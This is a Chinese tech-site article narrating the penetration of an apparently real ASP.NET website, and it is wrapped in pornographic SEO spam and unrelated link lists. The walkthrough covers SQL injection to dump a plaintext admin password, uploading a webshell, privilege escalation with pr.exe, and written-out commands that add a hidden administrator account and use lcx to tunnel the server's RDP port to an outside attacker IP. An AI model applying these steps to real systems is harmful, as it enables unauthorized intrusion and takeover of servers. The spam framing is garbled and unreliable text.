精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

實例:Public權限滲透某asp.net網站

原創
安全
對于數據庫用戶權限為Public的網站滲透相對較難,設置為這種權限,多數具有較高的安全意識,在通過SQL注入點獲取是Public權限時,需要多方分析,嘗試各種方法進行滲透測試,但不管如何,存在SQL注入點就是一種突破,通過SQL注入能夠獲取網站數據庫的一些信息,通過這些信息再次進行滲透和提權就相對會容易一些。

【51CTO.com 獨家特稿】本文知識要點:

(1)使用Google搜索管理后臺真實地址

(2)LCX端口轉發程序突破內網限制

(3)Asp.net類網站的滲透思路

對于數據庫用戶權限為Public的網站滲透相對較難,設置為這種權限,多數具有較高的安全意識,在通過SQL注入點獲取是Public權限時,需要多方分析,嘗試各種方法進行滲透測試,但不管如何,存在SQL注入點就是一種突破,通過SQL注入能夠獲取網站數據庫的一些信息,通過這些信息再次進行滲透和提權就相對會容易一些。尤其是在獲得網站后臺管理員權限的情況下,通過文件包含、數據庫備份、圖片上傳、文件上傳、插入一句話等來獲取Webshell。下面就以一個實際案例來分析如何利用Public權限滲透某asp.net網站。

1.尋找SQL注入點

通過查看網站的各個頁面,尋找有參數傳入的頁面,在有參數的頁面中進行出錯判斷,如圖1所示,在傳出參數typeid=1后面附加"'"使其自動爆出錯誤,通過該錯誤信息可以知道數據庫為MSSQL。

圖1 獲取SQL注入點

圖1 獲取SQL注入點

2.使用各種SQL注入工具進行信息收集和數據猜測

對于Asp.net類型網站除了一些大型商業專用滲透工具外,還有一些免費的工具,例如Pangolin、Havij、Domain3.5、HDSI2.5以及啊D等SQL注入工具。在本次滲透過程中先后使用了Pangolin、Havij,如圖2所示,使用Havij1.2免費版本測試效果并不好,未能獲取更多的信息。

圖2 使用Havij進行SQL注入滲透測試

圖2 使用Havij進行SQL注入滲透測試#p#

技巧

(1)在發現SQL注入點后一般先使用一些自動測試工具進行測試,在測試時可以依次使用多個工具進行測試,雖然這些SQL注入工具功能大致相同,但在某些場景下,使用有些工具能夠成功,然而使用某些工具就不一定成功。

(2)先工具后手工,事后進行總結加深對滲透到理解,并將有用的技巧收集整理。

3.使用Domain3.5檢測到目標網站存在SQL注入點

打開Domain3.5 SQL注入工具,單擊"SQL注入"-"SQL注入猜解檢測",將剛才測試所出錯前的正常頁面地址復制到"注入點"中,然后單擊"開始檢測",如果該注入點能夠進行SQL注入,則會在檢測信息中顯示詳細信息,如圖3所示,獲取該數據庫是MSSQL,當前數據庫以及當前權限等信息。

圖3 檢測SQL注入點

圖3 檢測SQL注入點

4.猜解數據庫中的表和表中的數據

這一步是SQL注入檢測中最重要的一步,如果能夠成功,就意味中可以查看和修改數據庫中的數據,單擊"猜解表名"猜解數據庫中一共有多少表,在本例中一共有33個表,然后查看數據庫表名稱來判斷哪個表是保存有管理員用戶名和密碼的,確定并選中,然后單擊"猜解列名"來獲取表中的具體列名,然后選擇需要查看內容的列名,最后單擊"猜解內容"來獲取其相應信息,如圖4所示,獲取了管理員的密碼,而且管理員的密碼是明文的未加密!

圖4 獲取數據內容

圖4 獲取數據內容#p#

5.掃描和獲取后臺地址

在Domain3.5中單擊"管理入口掃描"來獲取管理入口的具體地址,在本例中通過Domain3.5未能獲取管理后臺地址,這時候就需要動用其他方法,一個比較好的方法就是利用搜索引擎,使用"site:somesite.com 登錄"或者"site:somesite.com 系統管理"等來搜索后臺地址,如圖5所示,獲取了后臺的詳細地址。

圖5獲取后臺登陸地址

圖5 獲取后臺登陸地址

6.登錄測試和驗證

直接打開從搜索引擎中獲取的后臺地址,如果能夠正常訪問說明該頁面可能是真正的后臺地址,如圖6所示,該頁面能夠正常訪問,且通過頁面信息可以判定該地址就是管理后臺地址,輸入剛才獲取的用戶名和密碼進行測試, 登錄成功,如圖7所示。

圖6 后臺地址測試和驗證

圖6 后臺地址測試和驗證#p#

圖7 后臺登錄成功

圖7 后臺登錄成功

7.尋找、測試和獲取Webshell

(1)獲得圖片上傳頁面

當使用SQL注入工具或者手工注入獲得管理員的用戶名和密碼成功登錄系統后,需要查看系統信息發布等模塊,查看是否存在文件上傳部分,如果沒有,則嘗試插入一句話進行后臺備份等操作。在本次滲透過程中通過查看后臺的各個功能模塊,發現有四個信息添加模塊,在新建會員模塊中存在上傳圖片模塊,單擊鏈接進入新建會員模塊,如圖8所示,在圖片中直接選擇一個asp.net的Webshell,然后上傳。上傳結果顯示成功,如圖9所示。

圖8 獲得文件上傳模塊

圖8 獲得文件上傳模塊

圖9 文件上傳成功

圖9 文件上傳成功#p#

(2)查看文件上傳的真實地址

雖然頁面顯示文件上傳成功,但還需要找到文件上傳的真正地址,核對上傳的文件是否更改了后綴,新建會員后,需要從前臺來查看剛才添加到效果,如圖10所示,找到會員列表,然后尋找最后添加到記錄。

圖10 通過前臺查看上傳圖片

圖10 通過前臺查看上傳圖片

對于網站CMS系統處理新添加記錄有兩種結果,一種是按照最新時間排序,另外一種是降序,因此在翻看記錄時,需要分析數據添加的規律,在本例中就是按照時間升序排序,即最早添加的最先顯示,因此需要跳轉到頁碼最大處才能看到剛才添加的記錄,如圖11所示,右鍵選中圖片,查看圖片屬性,從而獲取該圖片的真實地址,上傳模塊未對上傳文件后綴等進行限制,上傳文件一律按照時間(年月日分秒)+原真實上傳文件名稱進行命名。

圖11 獲取圖片的真實地址

圖11 獲取圖片的真實地址#p#

(3)獲取Webshell

在IE瀏覽器中打開上傳Webshell的真實地址,如圖12所示,輸入Webshell的密碼后,出現熟悉的Asp.net Webshell界面。

圖12 成功獲得該網站的Webshell

圖12 成功獲得該網站的Webshell

8.嘗試提權

通過Webshell查看該服務器安裝程序和網站文件等,然后利用掌握的信息進行提權,在本次滲透過程中發現該服務器為內網服務器,通過防火墻映射到外網,對外僅僅開放了80端口,在網絡地址中未配置DNS,系統中無可提權的其他可用信息。因此首先嘗試使用pr進行提權。如圖13所示,先將pr程序上傳到回收站中,然后分別執行"E:\RECYCLER\pr.exe ", 參數"net user temp temp2005 /add",參數"net localgroup administrator temp /add"。執行結果顯示"命令成功完成",表示pr提權成功。

圖13使用pr提權

圖13使用pr提權#p#

9.登錄遠程桌面

(1)查看添加到用戶

在Webshell中通過CMDShell查看剛才添加的用戶是否成功,如圖14所示,可以看到系統已經添加了一個temp的管理員用戶。

圖14 查看添加到用戶

圖14 查看添加到用戶

(2)使用lcx進行端口轉發

在具有獨立IP的計算機上執行"lcx -listen 51 2008",意思是監聽51端口,并將51端口映射到本機的2008端口。

圖15 使用lcx進行端口監聽

圖15 使用lcx進行端口監聽#p#

在Webshell中執行"E:\RECYCLER\lcx.exe",參數設置為"-slave 202.XXX.XXX.XXX 51 172.30.11.81 3389",意思是連接IP地址202.XXX.XXX.XXX的51端口,將服務器內網地址為172.30.11.81的3389端口轉發到202.XXX.XXX.XXX的51端口上。

圖16使用lcx進行端口轉發

圖16使用lcx進行端口轉發

(3)連接遠程桌面

在監聽51端口的計算機中打開遠程終端登錄界面,然后輸入"127.0.0.1:2008"進行登錄,輸入剛才添加到temp用戶和密碼,如圖17所示,成功登錄系統,從而獲得服務器權限,成功滲透該服務器。

圖17成功進入系統

圖17成功進入系統

小結

1.對于Asp.net的滲透思路

(1)掃描目標網站,獲取SQL注入點或者其它漏洞。掃描目標網站可以使用一些商業掃描軟件,例如wvs,appscan,webinspect,jsky,極光等。通過掃描獲取網站程序漏洞和配置漏洞。在掃描結果中有關單獨的上傳頁面、上傳組件(各種WebEditor)、網站壓縮文件、bak備份文件的利用是重點。

(2)利用掃描結果信息進行滲透測試。

(3)獲取Webshell。獲取Webshell較多的方法是通過上傳,以及各類Web編輯器的漏洞,還有某一類程序的漏洞,當然這些漏洞的利用需要一些輔助條件。某些網站在被入侵后,入侵者會將整個網站進行打包,下載完畢后未刪除,如果能夠成功將其下載,對于分析漏洞和獲取Webshell很有幫助。

(4)對服務器進行提權。對服務器提權主要是看服務器上安裝有哪些程序,然后采取相對應的提權方法,例如讀取VNC密碼,讀取Radmin密碼,下載Pcanywhere密碼保存文件,利用Serv-u直接添加用戶,利用系統未安裝補丁程序進行本地提權,編寫autorun.inf病毒,導出腳本到啟動添加用戶,MSSQL SA權限直接添加系統用戶,Mysql udf函數提權等。

2.在擁有Webshell情況下,利用LCX端口轉發實現內網突破效果還是不錯的。

3.在使用SQL注入工具掃描不出后臺的情況下,可以嘗試通過Google搜索來獲取后臺真實地址。

【51CTO.com獨家特稿,非經授權謝絕轉載!合作媒體轉載請注明原文出處及出處!】

【編輯推薦】

  1. 名為LizaMoon的SQL注入攻擊正在席卷全球
  2. MySQL.com被SQL注入攻擊 用戶密碼數據被公布
  3. 使用Metasploit對思科IOS進行滲透測試
  4. 滲透測試:確保計劃成功的10個秘訣
責任編輯:佟健 來源: 51CTO.com
相關推薦

2009-07-29 09:14:36

ASP.NET網站

2009-07-27 14:24:16

ASP.NET訪問權限

2009-08-05 17:58:34

實現ASP.NET網站

2009-09-03 16:27:57

ASP.NET回車事件

2009-08-05 15:39:57

文件夾權限設置

2009-07-28 17:17:19

ASP.NET概述

2009-08-03 14:22:33

什么是ASP.NET

2009-07-22 17:45:35

ASP.NET教程

2009-07-27 17:20:05

2009-12-07 09:23:05

ASP.NET MVC

2009-07-29 15:55:48

ASP.NET Req

2009-09-09 22:53:34

ASP.NET 時間控

2009-07-24 15:07:56

ASP.NET上傳文件

2009-07-27 12:22:03

ASP.NET和ASPASP.NET入門教程

2009-08-05 15:10:04

ASP.NET網站設置

2011-06-28 15:14:10

ASP.NET性能優化

2009-07-28 17:15:17

ASP.NET權限管理

2009-07-29 09:12:31

ASP.NET數據庫連

2009-07-28 15:08:50

MVC三層架構實例

2009-07-28 11:34:02

ASP.NET架設
點贊
收藏

51CTO技術棧公眾號

精品一区二区三区毛片| 成人国产精品av| 在线免费观看a级片| 色戒汤唯在线| 欧美国产日韩亚洲一区| 亚洲在线视频观看| www.av麻豆| 国产欧美日韩一区二区三区四区| 欧美日韩大陆一区二区| 国产xxxx振车| 黄色软件在线观看| 国产中文字幕一区| 欧美一级片一区| 欧美一级特黄高清视频| 农村少妇一区二区三区四区五区 | 日韩精品色哟哟| 麻豆乱码国产一区二区三区| 国内精品久久99人妻无码| 欧美系列精品| 岛国av在线不卡| 亚洲最新免费视频| 三级av在线| 粉嫩av一区二区三区粉嫩| 国产精品久久网| 国产精品第一页在线观看| 欧美成人milf| 亚洲丝袜在线视频| 国产精品九九视频| 国产午夜久久av| 91久久国产最好的精华液| www.日本在线视频| 黄色在线论坛| 欧美激情一区二区三区在线| 精品乱子伦一区二区三区| 99re只有精品| 麻豆国产精品一区二区三区| 日韩av片免费在线观看| 国产午夜精品一区二区理论影院| 国产精品99久久精品| 亚洲人在线观看| 中文文字幕文字幕高清| 91精品啪在线观看国产手机| 777午夜精品视频在线播放| 精品久久久久久久免费人妻| av资源在线| 亚洲一区在线观看免费观看电影高清 | 成人黄色a**站在线观看| 国产日韩精品综合网站| 91黑人精品一区二区三区| 亚洲综合国产| 91sa在线看| 日本三级免费看| 国产精品红桃| 久久777国产线看观看精品| 日韩精品123区| 91欧美国产| 日韩在线免费视频| 我要看一级黄色录像| 青青草成人影院| 在线精品国产成人综合| 欧美成人短视频| 日韩午夜电影网| 色av吧综合网| 亚洲一级生活片| 中文字幕一区二区三区乱码图片 | 欧美日本乱大交xxxxx| 亚洲欧美日韩综合网| 日韩一区二区三区四区五区| 7777女厕盗摄久久久| 99九九精品视频| 国产一区精品二区| 欧美变态口味重另类| 俄罗斯黄色录像| 欧洲亚洲视频| 亚洲一区二区黄| 大胸美女被爆操| 久久久久美女| 欧美极品少妇xxxxⅹ免费视频| 日韩av黄色片| 久久一区精品| 91九色视频导航| 亚洲男人天堂久久| 26uuu欧美日本| 亚洲一二三区精品| 男人资源在线播放| 亚洲va欧美va天堂v国产综合| 国产精品50p| 成人精品动漫| 日韩一区二区电影在线| 日韩精品视频一区二区| 国产亚洲一区二区三区不卡| 色吧影院999| 欧美成人一二三区| 久久成人精品| 成人妇女淫片aaaa视频| 日韩在线观看视频网站| 国产视频一区在线播放| 最新av在线免费观看| 182在线视频观看| 色狠狠一区二区| 久久精品一二三四| 亚州综合一区| 久久夜色精品国产亚洲aⅴ| 日本黄色片视频| 奇米影视7777精品一区二区| 国产三区精品| 天堂资源在线中文| 欧美日韩日本国产| 日韩欧美色视频| 国产成人1区| 久久久久久18| 在线免费观看日韩视频| 成人av高清在线| 在线观看成人av电影| 国产伦久视频在线观看| 欧美高清性hdvideosex| av中文字幕免费观看| 午夜久久99| 国产精品视频公开费视频| 黄频网站在线观看| 中文字幕中文在线不卡住| 国产免费观看高清视频| 色播一区二区| zzijzzij亚洲日本成熟少妇| 日韩欧美成人一区二区三区| 国产福利91精品一区| 亚洲一区二区三区午夜| 亚洲欧美电影| 亚洲国产精品美女| 日本青青草视频| 美女视频一区在线观看| 欧美在线激情| 亚洲精品88| 亚洲成人中文字幕| 欧美成人片在线观看| 精品亚洲欧美一区| 亚洲国产精品日韩| 三级成人黄色影院| 亚洲免费一在线| 国产精品视频久久久久久久| 成人免费高清在线| 18视频在线观看娇喘| 青青在线精品| 色播久久人人爽人人爽人人片视av| chinese国产精品| 91亚洲资源网| 免费国产黄色网址| 精品亚洲免a| 久久久久久久91| 超碰免费在线97| 一区二区三区日本| 亚洲国产综合av| 欧美激情第二页| 91手机视频在线观看| 蜜桃视频在线观看www社区 | 欧美精品福利视频| www.久久成人| 悠悠色在线精品| 中文字幕在线观看91| 黄色在线成人| 国产一区二区精品免费| а√天堂8资源中文在线| 亚洲国产欧美自拍| 精品国产免费观看| 久久综合狠狠综合久久激情 | 欧美激情网站| 亚洲奶大毛多的老太婆| 五月婷婷丁香在线| 国产精品理伦片| 91精品国产三级| 亚洲一级影院| 日本不卡二区| 亚州精品国产| 欧美日韩成人在线播放| 全部免费毛片在线播放一个| 欧美日韩国产在线看| 搡老熟女老女人一区二区| 久久精品电影| 一级日韩一区在线观看| 色妞ww精品视频7777| 91av国产在线| 思思99re6国产在线播放| 日韩一区二区在线观看| 日韩欧美三级在线观看| 国产日产欧美一区| 深爱五月综合网| 999亚洲国产精| 日韩资源av在线| 91精品网站在线观看| 国内精品久久久久伊人av| 免费观看国产视频| 91福利视频网站| 国产高潮国产高潮久久久91| 91亚洲精华国产精华精华液| 第四色婷婷基地| 在线欧美福利| 亚洲春色在线| 大桥未久女教师av一区二区| 国产精品久久久久高潮| 日韩av激情| 亚洲天堂av图片| 精品毛片在线观看| 在线观看免费成人| 日本天堂网在线观看| 中文字幕第一区| 99热超碰在线| 久久国产福利国产秒拍| 分分操这里只有精品| 久久精品国产68国产精品亚洲| 国产精品高清一区二区三区| 日韩深夜福利网站| 日本成人免费在线| 影音先锋在线播放| 亚洲午夜精品久久久久久久久久久久 | 三级外国片在线观看视频| 精品久久久久久无| 亚洲影视一区二区| 日韩欧美在线视频日韩欧美在线视频| 99久久婷婷国产综合| 久久久777精品电影网影网| 一级日本黄色片| 蜜臀久久99精品久久久久宅男| 亚洲熟妇av一区二区三区漫画| 亚洲色图网站| 亚洲精品一区二区毛豆| 香蕉视频一区| 久久99九九| 午夜久久av| 69堂成人精品视频免费| 日韩城人网站| 国产精品视频精品| 日韩精品一区二区三区| 97香蕉久久超级碰碰高清版| 天堂av最新在线| 日韩在线观看免费高清完整版| 九一在线视频| 日韩禁在线播放| 天天操天天射天天| 精品99999| 成人小说亚洲一区二区三区| 在线综合亚洲欧美在线视频| 国产偷人爽久久久久久老妇app| 日韩欧美精品中文字幕| 日本熟妇成熟毛茸茸| 亚洲va韩国va欧美va精品| 免费看一级一片| 亚洲综合激情网| 黄色一级免费视频| 亚洲自拍另类综合| 久久久久香蕉视频| 亚洲一区成人在线| 久久免费黄色网址| 亚洲一区二区三区四区在线| 玖玖爱免费视频| 亚洲综合丁香婷婷六月香| 久久久久久欧美精品se一二三四| 尤物视频一区二区| 国产亚洲精品成人| 亚洲成av人片在线观看无码| 国产视频91在线| 欧美色xxxx| 免费黄色一级大片| 欧美日本不卡视频| 99久久一区二区| 欧美mv和日韩mv的网站| 少妇人妻偷人精品一区二区| 亚洲乱码一区二区| av在线播放网| 久久久精品中文字幕| 国产在线xxx| 456亚洲影院| 国产在线|日韩| 91精品视频播放| 国产精品极品在线观看| 久久久一本精品99久久精品| 欧美在线观看视频一区| 伊人色综合久久天天五月婷| 综合久久综合| 国产资源在线视频| 日韩福利电影在线观看| 天堂av2020| 99久久国产综合精品女不卡| 丰满少妇高潮一区二区| 国产精品免费久久久久| 青娱乐91视频| 欧美性xxxx| 91精品国产色综合久久不8| 日韩一区二区在线观看视频播放| 污视频软件在线观看| 国产亚洲精品久久| 精品不卡一区二区三区| 在线观看亚洲国产| 日韩一级片网站| 日韩在线免费播放| 色偷偷91综合久久噜噜| 国产啊啊啊视频在线观看| 日韩免费观看在线观看| 24小时成人在线视频| 国产精品久久久久免费| 波多野结衣在线播放一区| 国产精品无码电影在线观看| 天堂久久一区二区三区| 搡的我好爽在线观看免费视频| 久久一区二区视频| 欧美三级在线免费观看| 色婷婷亚洲综合| 超碰福利在线观看| 最近中文字幕日韩精品| 美女露胸视频在线观看| 成人疯狂猛交xxx| 久久97视频| 超碰人人爱人人| 美腿丝袜亚洲综合| 精品人妻无码一区二区三区| 亚洲免费资源在线播放| 无码人妻aⅴ一区二区三区有奶水| 欧美一区二区三区精品| 最新97超碰在线| 青青久久aⅴ北条麻妃| 日韩精品成人在线观看| 日韩中文字幕av在线| 国产日韩亚洲欧美精品| www.欧美com| 成人欧美一区二区三区视频网页| 午夜精品一区二| 日韩大陆欧美高清视频区| 日本在线观看高清完整版| 国产日韩精品在线| blacked蜜桃精品一区| 欧美a v在线播放| 成人国产电影网| 中文字幕av久久爽av| 欧美精品亚洲一区二区在线播放| 激情福利在线| 欧美在线视频一区| 鲁大师精品99久久久| 2018中文字幕第一页| 国产风韵犹存在线视精品| 日韩一区二区不卡视频| 欧美日韩久久久一区| 国产精品四虎| 国产成人欧美在线观看| 国产真实有声精品录音| 国产日韩成人内射视频 | 一本色道久久综合亚洲aⅴ蜜桃 | 国产日产欧美一区二区| 精品一区二区三区香蕉蜜桃| 国产黄色大片免费看| 91精品福利视频| 国产在线网站| 国产精品一区二区电影| 日韩欧美电影| 成年人三级黄色片| 亚洲色图视频网站| 999免费视频| 欧美精品久久一区二区 | 日韩欧美在线电影| 三级影片在线观看欧美日韩一区二区| 亚洲午夜福利在线观看| 日韩欧美在线一区| 国产高清视频在线观看| 国产精品精品视频| 水蜜桃精品av一区二区| 青青草久久伊人| 一区二区三区日韩欧美| 欧美特级特黄aaaaaa在线看| 91禁外国网站| 精品美女久久| 激情综合网俺也去| 中文字幕在线一区免费| 99国产揄拍国产精品| 欧美区二区三区| 日韩精品免费一区二区夜夜嗨| 各处沟厕大尺度偷拍女厕嘘嘘| 国产色一区二区| 国产毛片毛片毛片毛片毛片| 欧美激情18p| 少妇精品久久久一区二区| 欧美婷婷精品激情| 亚洲免费色视频| 天天射,天天干| 国产精品久久久一区| 你懂的国产精品| 亚洲国产欧美视频| 精品视频在线视频| 免费污视频在线观看| 欧美日韩国产综合视频在线| 精品一区二区三区久久久| 久久久久久蜜桃| 伊人伊成久久人综合网小说| 精品国产亚洲一区二区在线观看| 天天夜碰日日摸日日澡性色av| 亚洲国产精品v| 蜜臀久久久久久999| 国产精品国语对白| 国内精品99| 91社区视频在线观看| 亚洲精品在线电影| 四虎国产精品免费久久5151| 日韩免费视频播放|